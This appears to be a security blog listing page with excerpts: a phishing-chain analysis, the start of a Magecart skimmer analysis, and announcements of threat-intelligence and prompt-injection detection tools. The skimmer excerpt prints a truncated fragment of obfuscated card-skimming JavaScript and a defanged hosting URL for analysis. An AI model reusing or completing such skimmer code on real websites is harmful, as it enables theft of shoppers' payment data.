TLDR
I have recieved a legit Zoom doc email from HR “while on job hunt” . It redirected to a site with a fake “bot protection” gate and then to a Gmail credential phish. The attackers exfiltrate creds live over WebSocket and even validate them in the backend. Keep reading for detailed analysis.
look mom HR application look mom no job Okay, this is kind of funny (in a “please tell me this is not my life” way).
Starting Point It all began with a tweet:
sdcyberresearch on X
This tweet hinted at a Magecart-style campaign involving malicious JavaScript injection to skim payment data.
Initial Sample The script was hosted at:
https://www.cc-analytics[.]com/app.js
The original code was heavily obfuscated:
(function() { function _0x1B3A1(_0x1B563, _0x1B3FB, _0x1B455, _0x1B509, _0x1B4AF, _0x1B5BD) { _0x1B4AF = function(_0x1B3A1) { return (_0x1B3A1 < _0x1B3FB ? '' : _0x1B4AF(parseInt(_0x1B3A1 / _0x1B3FB))) + ((_0x1B3A1 = _0x1B3A1 % _0x1B3FB) > 35 ?
A lightweight, fast, and easy-to-use service for detecting LLM prompt injection attempts before they reach your model. No extra latency, no extra LLM calls — just a simple API that returns true or false.
We are excited to announce the launch of our new API for Cloud Intel Atomic Indicators, a tool designed to provide essential data on malicious IP addresses. This API is a step forward in our commitment to enhancing cybersecurity and is available free of charge.
Behind the Scenes: Cloudflare Infrastructure Our API leverages the robust Cloudflare infrastructure, utilizing Cloudflare Workers for efficient handling of API requests, Cloudflare KV Store for secure key management, and Cloudflare R2 for reliable data storage.
Announcing AWSAttacks - a curated repository on GitHub dedicated to AWS threat intelligence. Explore, share feedback, and contribute to enhance our collective cybersecurity knowledge!
Meet FriendlyIR, your innovative cybersecurity ally on Slack! It streamlines your tracking of the latest cybersecurity news, blog posts, and social media updates in real-time.